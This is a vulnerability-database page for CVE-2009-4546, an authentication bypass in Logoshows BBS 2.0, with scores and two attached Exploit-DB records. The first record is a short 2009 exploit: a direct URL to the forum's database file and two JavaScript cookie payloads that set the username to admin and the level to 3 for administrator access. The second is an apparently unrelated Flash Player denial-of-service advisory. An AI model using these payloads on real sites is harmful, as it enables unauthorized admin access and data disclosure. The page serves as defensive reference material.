CVE-2009-4546
Published: 2010-01-04
Priority: P3 · 52 · Severity: high · CVSS 2.0 base score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 2.63% (83.6th percentile)
globepersonnel_login.asp in Logoshows BBS 2.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) pb_username (aka pb%5Fusername) and (2) level cookies.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| logoshows | logoshows_bbs | — | — |
No detection rules found.
Exploit-DB: logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling (exploitdb, 2009-08-07, CVE-2009-4546)
---
Logoshows BBS 2.0 DD
ZoRLu
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: http://www.milw0rm.com/exploits/9389
vuln:
http://www.logoshows.com/bbs/database/globepersonnel.mdb
Logoshows BBS 2.0 ICH
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: http://www.milw0rm.com/exploits/9389
demo:
http://www.logoshows.com/bbs/globepersonnel_login.asp
exploit:
javascript:document.cookie = "pb%5Fusername=admin; path=/";
exploit:
javascript:document.cookie = "level=3; path=/";
after you go here:
http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0
thanks: str0ke and all friends
# milw0rm.com [2009-08-07]
Exploit-DB: Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service (exploitdb, 2008-10-02, CVE-2008-4546)
---
source: https://www.securityfocus.com/bid/31537/info
Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue will allow attackers to crash the browser that uses the plugin, denying service to legitimate users.
The following versions of Flash Player Plugin are vulnerable:
9.0.45.0
9.0.112.0
9.0.124.0
10.0.12.10
UPDATE (March 11, 2009): Flash Player Plugin 10.0.22.87 is vulnerable.
UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed.
UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available.
No writeups or analysis indexed.